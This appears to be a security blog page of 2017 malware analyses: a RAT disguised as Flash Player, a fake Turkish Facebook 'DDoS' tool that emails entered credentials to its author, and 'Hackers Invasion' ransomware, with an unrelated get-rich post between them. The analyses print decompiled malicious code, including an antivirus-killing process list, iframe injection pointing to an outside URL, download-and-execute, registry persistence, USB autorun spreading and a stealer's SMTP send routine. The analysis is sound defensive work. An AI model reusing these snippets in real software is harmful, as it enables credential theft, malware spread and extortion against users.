Friday, October 27, 2017

Quick Sample Analysis

File detail:
File Name: Micrbarin.exe
MD5: 21AE834BDD5B89BACACCA4D51CF82148
Size: 3.64 MB
NSIS installer file

This file is NSIS installer, we found inside the strings.

Behavioural Analysis
Executed the Micrabarin.exe in the controlled environment to observe the behaviour. We got new processes comes in the memory and windows security alert block the process by stating that the file is adobe flash player. And those new processes are having flash player icon.

Registry traces:
HKEY_CURRENT_USER\Software\TektonIT
HKEY_CURRENT_USER\Software\TektonIT\Remote Manipulator System
HKEY_CURRENT_USER\Software\TektonIT\Remote Manipulator System\Server
HKEY_CURRENT_USER\Software\TektonIT\Remote Manipulator System\Server\Parameters

HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\ShellNoRoam\MUICache "C:\Documents and Settings\All Users\rutserv.exe" Data: Adobe Flash Player 27.0 r0
HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\ShellNoRoam\MUICache "C:\Documents and Settings\All Users\rutserv.exe"   Data: Adobe Flash Player 27.0 r0
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run "sys"
Data: c:\ProgramData\rutserv.exe
HKEY_CURRENT_USER\Software\TektonIT\Remote Manipulator System\Server\Parameters "CalendarRecordSettings"
Data: (data too large: 1182 bytes)
HKEY_CURRENT_USER\Software\TektonIT\Remote Manipulator System\Server\Parameters "FUSClientPath"
Data: C:\Documents and Settings\All Users\rfusclient.exe
HKEY_CURRENT_USER\Software\TektonIT\Remote Manipulator System\Server\Parameters "InternetId"
Data: (data too large: 352 bytes)
HKEY_CURRENT_USER\Software\TektonIT\Remote Manipulator System\Server\Parameters "notification"
Data: (data too large: 563 bytes)
HKEY_CURRENT_USER\Software\TektonIT\Remote Manipulator System\Server\Parameters "Options"
Data: (data too large: 1391 bytes)
HKEY_CURRENT_USER\Software\TektonIT\Remote Manipulator System\Server\Parameters "Password"
Data: (data too large: 256 bytes)
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List "C:\Documents and Settings\All Users\rutserv.exe"
Data: C:\Documents and Settings\All Users\rutserv.exe:*:Enabled:Adobe Flash Player 27.0 r0
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List "C:\Documents and Settings\All Users\rutserv.exe"
Data: C:\Documents and Settings\All Users\rutserv.exe:*:Enabled:Adobe Flash Player 27.0 r0

File created
c:\Documents and Settings\All Users\rfusclient.exe
c:\Documents and Settings\All Users\rutserv.exe


Post made by

Sunday, October 15, 2017

Three ways to become Millionaire

A person who holds more than million dollars (USD) of asset value such as property, stocks, vehicles and cash in the bank. At least 90% of the people in this world definitely have the thoughts to become millionaire at any point in their lifetime. Next question arises in everyone mind is it achievable and if so then how to become millionaire.


Let we breakdown it to three ways to become millionaire:
  • ·         Side lane
  • ·         Slow lane
  • ·         Fast lane

These three ways help people to achieve the millionaire status in some point of their life. What are these lanes and what it actually means?
These lanes are paths to the same goal, it is like travelling to same destination via different ways. We will explain each of these lane and what it actually takes in these lane. First one is side lane in our list.

Side lane
If you got athletic ability then you can choose the side lane. Side lane is the path for people who have prominent performance in the sports. If you know boxing well then you can spend more time on practising the boxing and earn millions of dollar in a match. Problem with this lane, people who perform well in the sports not getting received pay cheque after they stops play due to poor money management. We can give hundreds of athletes’ name who not get paid after their heyday or peak time ended.


Pros of side lane:
Reaching greater fame in short period.
Even earn millions per year and million for each season.


Cons of side lane:
Prime time or peak time is very much limited.
Sports person most of the time have poor money management.

Slow lane
Slow lane is very easiest way to become millionaire but it is also the slowest way to reach destination. This is for general population who lacks athletic ability and creative thinking. Joining a good institution and study any craft or interested course and getting job as office worker. If they save five to ten percentage per year, then invest them in banks and stocks. It will yield them millionaire status during retirement time.


Pros of slow lane:
Steady growth
More chances of reaching the goal


Cons of slow lane:
Reaching time of the goal is almost take lifetime.

Fast lane
This is rocket speed lane. In this lane, you need to give more value for the society so that it will return. Take the examples of Gates, Jobs, Musk, Zuckerberg and Page: they all give more to the society. If you have the creativity, dedication to the core will give you the leading edge. Suppose if you solve the cure for diseases like cancer and AIDS. Then you will become not just millionaire and end up as billionaire.


Pros of fast lane:
No need to wait for life time to reach the goal.
Enormous wealth in short span.


Cons of fast lane:
Only thing is you need to be very hard worker and risk taker. Most of the time end up in spending more time on research, study the needs and focus more time on business meeting which includes satisfying the customer, investor and your employees.

Conclusion
Please choose wisely and reach your goal. Becoming millionaire is in your hand, your decision only makes what you are going to be. But the last lane even make you billionaire. 

Post by
newWorld

Friday, October 13, 2017

Fake Facebook DDoS Malware – Actually a password stealer

Last month security researchers discovered Facebook password stealer malware with njRat. This month we got another malware which claims that it can target a given profile and perform DDoS. But it actually a password stealer and it targets the Turkish users.

Static Analysis of the sample (code analysis)
MD5: F7BED7CD45A98275470707E54976C009
File Type: 32-Bit Exe
Size: 845824 Byte(s)

Figure 1 CompilerDetect -> .NET
The malware is compiled using .Net and we started to work on the strings and code analysis of this sample. When we looked in to the strings, we found very interesting details:

·         0000000CCA0D   0000004CE60D      0   Account Close
·         0000000CCA29   0000004CE629      0   CheckBox3
·         0000000CCA63   0000004CE663      0   ProgressBar1
·         0000000CCA7D   0000004CE67D      0   Label4
·         0000000CCADF   0000004CE6DF      0   $this.BackgroundImage
·         0000000CCB0B   0000004CE70B      0   $this.Icon
·         0000000CCB21   0000004CE721      0   FACEBOOK
·         0000000CCB33   0000004CE733      0   FACEBOOK KAPATMA 2017
·         0000000CCB5F   0000004CE75F      0   Login Successful Account will be closed within 5 minutes.
·         0000000CCBD3   0000004CE7D3      0   furkanbabalog(at)gmail.com
·         0000000CCC03   0000004CE803      0   smtp.gmail.com
·         0000000CCC21   0000004CE821      0   sanane123
·         0000000CCC35   0000004CE835      0   Facebook_Kapatma_2017.Resources
·         0000000CDB66   0000004D2166      0   VS_VERSION_INFO
·         0000000CDBC2   0000004D21C2      0   VarFileInfo
·         0000000CDBE2   0000004D21E2      0   Translation
·         0000000CDC06   0000004D2206      0   StringFileInfo
·         0000000CDC2A   0000004D222A      0   000004b0
·         0000000CDC42   0000004D2242      0   FileDescription
·         0000000CDC64   0000004D2264      0   Facebook Kapatma 2017
·         0000000CDC96   0000004D2296      0   FileVersion
·         0000000CDCB0   0000004D22B0      0   1.0.0.0
·         0000000CDCC6   0000004D22C6      0   InternalName
·         0000000CDCE0   0000004D22E0      0   Facebook Kapatma 2017.exe

File description, resource details and email credentials (highlighted in red colours) are found inside the sample. Using this credential, we tried to login and stop the victim. But Gmail stops to verify that device isn’t recognise. It probably place holder account for hacker.

Figure 2 Gmail security ask for verification

File resources showing image as background which appears like hackers in movie posters.

Figure 3 Background Image

Figure 4 Facebook Kapatma

‘Kapatma’ is a Turkish word and it means ‘close down’. The above image is the detail of the classes found in the code. Inside the code we find input details as in the checkbox and label.
                this.Label1.Text = "E-posta"; // E-posta means email.
this.Label2.Text = "Şifre"; // Şifre means password.
this.CheckBox1.Text = "Ddos Attack";
this.Button1.Text = "Hesabı Kapat"; // Hesabi kapat means close account.
this.Label3.Text = "URL:";
this.CheckBox3.Text = "Complaint Attack\r\n";
this.Label4.Text = "NOT:Hesap 5Dakika İçerisinde Kapatılır ! "; // Acc. Closed Within 5 Min
The purpose is to collect the Facebook credentials to login in the tool and mentioned url will be the profile to be attacked. Let see how the collected details will be transferred.
private void Button1_Click(object sender, EventArgs e)
{ MailMessage mailMessage = new MailMessage();
Try {
Interaction.MsgBox("Login Successful Account will be closed within 5 minutes.", MsgBoxStyle.OkOnly, null);
mailMessage.From = new MailAddress("furkanbabalog(at)gmail.com");
mailMessage.To.Add("furkanbabalog(at)gmail.com");
mailMessage.Subject = this.TextBox1.Text;
mailMessage.Body = this.TextBox2.Text;
new SmtpClient("smtp.gmail.com")
{Port = 587,
EnableSsl = true,
Credentials = new NetworkCredential("furkanbabalog(at)gmail.com", "sanane123")
}.Send(mailMessage);
}
The above code snippet shows that the collected credentials are send us email by login to the given gmail account and sent the detail to same account (i.e.) from and to address are same email address only. 

Behavioural analysis

We executed the sample in our controlled environment. We observed that the file opens gui as follows:

Figure 5 GUI of the fake tool


We entered random text inside the text box, selected all the boxes. Once we clicked the button, message box appears as login successful account will be closed in 5 minutes.

Figure 6 Login successful message box


No any file traces and registry traces are added after the execution of this malware.

Conclusion:

We are seeing this emerging trend as Facebook hacking tools and DDoS tools which actually steals the tool user credentials and not the given target. It is high time to educate the user that these tools are fake tools - password stealer and not a hack tool or crack tool. In this case, it targets Turkish people and we may expect these kind of tools to other part of the world. 

Friday, October 6, 2017

Analysis of Hackers Invasion ransomware

 OVERVIEW

Today we got new ransomware for analysis and it is named as Hacker Invasion ransomware. It is referred as FTSCoder ransomware too.


                                   DELIVERY
Hacker Invasion variants of ransomware family are delivered by hacking in to the network by malware authors. Email campaign is the other option for the attackers to deliver these variants.


                                      INFECTION

Static Analysis:
MD5: B6E74930507305AC9B98A16230A5B02C

Figure 1 Compiled in .net
Compiler Detect -> .NET 
File Type: 32-Bit Exe (Subsystem: Win GUI / 2), Size: 53760 (0D200h) Byte(s). This file got version info details and it says the original file name is ‘NIBIRU1.exe’, Product name and description as ‘NIBIRU’. We got generic results for these names in search results. We started to our static analysis work and see what this malware code is working.

This malware sample have one of a class called ‘anti’. Inside of this class, we got function called ‘killall()’.
Figure 2 Class anti (killall function)


The above snapshot gives detail of other classes apart from ‘anti’ are msnshare, skype, p2p, yahoo and usb. We will look into all these one by one.

Figure 3 killall function
Killall function does operation of comparing strings in the process names and if the process string have those strings then it get process id using GetProcess() and kill that given process. The list of strings looked by the function in the running processes:
·         Av - antivirus
·         Hijackthis - tool to inspects your computers browser and operating system settings to generate a log file of the current state of your computer.
·         Outpost – Personal firewall (component of Agnitum Outpost Firewall Pro by Agnitum).
·         Npfmsg - NPFMessenger MFC Application belongs to software NPFMessenger Application.
·         Bdagent - file associated with bitdefender antivirus.
·         Kavsvc – file associated with Kaspersky antivirus.
·         Egui – file associated with ESET antivirus.
·         Zlclient – file associated with zone lab alarms antivirus.
All these processes are related to security products. So this malware actually wants to kill these security related process to stop them functioning.
There are four forms present in the list of classes. Those classes have functionalities related to other classes like injectx, skype, yahoo, p2p, and msnshare. We checked all these classes to understand their functionalities. Let see what injectx class have:
Injectx class appears to be launching the batch script. This starts with the looking for batch file inside system32 folder (refer the following code).

                public static void injectX_Sp()
                {
                try
                {
                if (File.Exists("C:\\WINDOWS\\system32\\launch.bat"))
                {
                File.Delete("C:\\windows\\system32\\launch.bat");
                }

The function checks for the launch.bat and if the file exist then it deletes that batch else it goes for creation of the script in the same location. Refer the following snapshot: 

Figure 4 creation of launch batch script
The above snapshot is the else condition for not presence of launch.bat file. Launch batch script is getting created with the help of this function.
("echo ^<iframe src=\"hxxp://www.whathaveyouchosen[.]com[.]au/modules/mod_breadcrumbs/tmpl/Config/show.php\"height=0 width=0^> >>%%o");
(")");
("for %%m in (*.html) do (");
("echo ^<iframe src=\"hxxp://www.whathaveyouchosen[.]com[.]au/modules/mod_breadcrumbs/tmpl/Config/show.php\"height=0 width=0^> >>%%m");
(")");
("for %%y in (*.htm) do (");
("echo ^<iframe src=\"hxxp://www.whathaveyouchosen[.]com[.]au/modules/mod_breadcrumbs/tmpl/Config/show.php\"height=0 width=0^> >>%%y");




We accessed that url, it gives 404 error from the site and it seems they removed the show.php and modules directory. Apart from the batch file creation, this function creates another script called launch.vbs inside the system32 location.
new FileStream("C:\\windows\\system32\\launch.vbs", FileMode.Create, FileAccess.Write);
StreamWriter streamWriter2 = new StreamWriter(stream2);
StreamWriter2.BaseStream.Seek(0L, SeekOrigin.End);
StreamWriter2.WriteLine("Dim oShell");
StreamWriter2.WriteLine("Set oShell = WScript.CreateObject (\"WScript.Shell\")");
StreamWriter2.WriteLine("oShell.run \"C:\\windows\\system32\\launch.bat\",0,True");
StreamWriter2.WriteLine("Set oShell = Nothing ");
StreamWriter2.Close();
Process.Start("C:\\windows\\system32\\launch.vbs");
The above code is to create the vbs which actually to executes the launch.bat file. At the final line is for the creation of process ‘launch.vbs’.
Install class is the next in the code which copies an executable file called svchost.exe in local drive. And it also set the file attributes as hidden.
File.Copy(Application.ExecutablePath, "C:\\svchost.exe");
File.SetAttributes("C:\\svchost.exe", FileAttributes.Hidden);

Figure 5 Class Install (code)

This piece of code is very interesting to see what it actually does. After it creation of svchost file in the ‘C’ drive, the code has download file with the file name and location. Refer this code:
MyProject.Computer.Network.DownloadFile(install.link, Application.StartupPath + "\\file.exe");
File.SetAttributes(Application.StartupPath + "\\file.exe", FileAttributes.Hidden);
Process.Start(Application.StartupPath + "\\file.exe");
Further to this, there is creation html file in the windows folder as sp.htm.
StreamWriter streamWriter = new StreamWriter("C:\\windows\\sp.htm");
File.SetAttributes("C:\\WINDOWS\\sp.htm", FileAttributes.Normal);
This sp.htm file have iframe which actually points the install.link, which is the downloaded file in the startup path as ‘file.exe’. After the file creations and downloading, the persistence will be created for the svchost.exe using two registry key.
MyProject.Computer.Registry.SetValue("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", "Microsoft", "C:\\svchost.exe");
MyProject.Computer.Registry.SetValue("HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", "Userinit", "C:\\WINDOWS\\SYSTEM32\\Userinit.exe,C:\\svchost.exe");
They are the autostart entries (run registry entry and winlogon entry) which locates the physical location. These artifacts can be utilized as IOC.


Figure 6 Lan class
Lan class is used here to collect the details of the host machine such as host address, host name and workgroup detail. We moved on to the msnshare class where it works for creation new file called ‘mypornpics.scr’ in the appdata location under the messenger folder. Refer the following snapshots:

Figure 7 File location used by MSN class

Figure 8 Checking for the existence of the file called 'mypornpics'
Except USB class, other classes like skype, yahoo where actually doing similar functionality like MSN class. Let us focus on the functionality of USB class:
This USB class retrieving the details of logical drives using Directory.GetLogicalDrives(). It does a file copying operation and the copied file is ‘ntldr.exe’. After that, autorun.inf file is created with each line is written like the following code:
StreamWriter streamWriter = new StreamWriter(str + "autorun.inf");
streamWriter.WriteLine("[autorun]");
streamWriter.WriteLine("open = ntldr.exe");
streamWriter.WriteLine("shellexecute=ntldr.exe");
streamWriter.Close();
File.SetAttributes(str + "autorun.inf", FileAttributes.Hidden);
File.SetAttributes(str + "ntldr.exe", FileAttributes.Hidden);
This code is actual content of autorun.inf where ntldr.exe will be executed automatically and hidden attributes are applied for both the files (autorun.inf and ntldr.exe).

Interesting resource detail (string table)

Figure 9 Panic message
This panic message was found in the file resource. This detail actually present in the form3 of resources. It is the time to look in to the codes of all the four forms (form1, form2, form3, and form4).
this.yourmutex = Environment.UserName + "MutexXx";
Mutex is created with the combination of the username and “MutexXx”.  After this only, initialize component comes with listbox and finally it calls for following:
·         Install()
·         InjectX.injectX_Sp();
·         lan.lan_sp();
·         anti.killall();
·         msnshare.msnshare_sp();
·         p2p.p2p_sp();
·         yahoo.yahoo_sp();
·         skype.skype_sp();
·         usb.usb_sp();
Then goes to sleep - Form1.Sleep(1500000L). And finally starting of the process ‘svchost.exe’ -Process.Start("C:\\svchost.exe").
Now we started to analysis the code of form2 class and its functions. This contains encryption routines, targeted file types, and extension added to the encrypted files.
public enum CryptoAction
{
                ActionEncrypt = 1,
                ActionDecrypt
}The above snap is the code for the encryption of the files. FileStream is getting the file as input with access to read the file and write the file after the encryption. And form2 closing with the following in the message box:
MessageBox.Show("STOP,pay your ransome", "Security", MessageBoxButtons.OK, MessageBoxIcon.Hand);
Similar to a panic message or an alert to the victim. File extension created for the encrypted file is .doxes as extension.
byte[] bytKey = this.CreateKey("Doxes");
byte[] bytIV = this.CreateIV("Doxes");
this.EncryptOrDecryptFile(this.filenamez, this.filenamez + ".Doxes", bytKey, bytIV, Form2.CryptoAction.ActionEncrypt);
Those encrypted file names are added with the extension as “.Doxes”.
Form3 is very important because we found the unlock key for this ransomware. In that, we got label3 text which is totally shocking that the ransom amount is USD 120K and if delayed then the ransom is USD one million.
Label3.Text = "WE ARE READY TO GIVE YOU THE KEY TO GET ALL YOUR FILES,\r\nDOCUMENTS AND YOUR LIFE BACK IF ONLY YOU PAY $120,000\r\nWITHIN 54 HOURS.IF YOU DELAY YOU PAY $1 MILLION TO US.";
And label6 shows the detail of how to pay the ransom via bitcoin.
Label6.Text = "(1)Google Paxful.com (2)SIGN UP AND GET A BITCOIN WALLET\r\n(3)BUY $120,000 WORTH OF BITCOIN(4)PAY INTO OUR BITCOIN ADDRESS\r\nABOVE(5)SEND THE PAYMENT PROOF TO OUR CONTACTS(6)YOU GET KEY";
Email contact details are mentioned as the following and it present in the label7.
Label7.Text = "(1) HillaryTrump(at)protonmail.com\r\n(2)James.cute(at)mail.com";

Key to unlock is actually present inside the program. Let’s see the below code:
Label8.Text = "ENTER KEY";
Control arg_689_0 = this.TextBox1;
The label8 is text for entering the key which is actually stored in TextBox1.
Operators.CompareString(this.TextBox1.Text, "AnikulapoFela70".
Key to unlock is AnikulapoFela70.

Figure 11 Ransom screen with ransom notes, payment detail, and enter key box
                                      THREAT Indicators
IOC details:
Email:
HillaryTrump(at)protonmail.com
James.cute(at)mail.com
File Extension added:
.Doxes

                                   Conclusion
Ransomware attacks are carried out by malware authors with new functionalities and better target. To prevent these attacks, best security practices consists proper backup, updated anti-ransomware modules with top anti-virus to be implemented. Users are recommended to be more cautious on attachments from unknown users. Keeping the network passwords very strong will be helpful.



Operating system - Part 1:

 In our blog, we published several articles on OS concepts which mostly on the perspective for malware analysis/security research. In few in...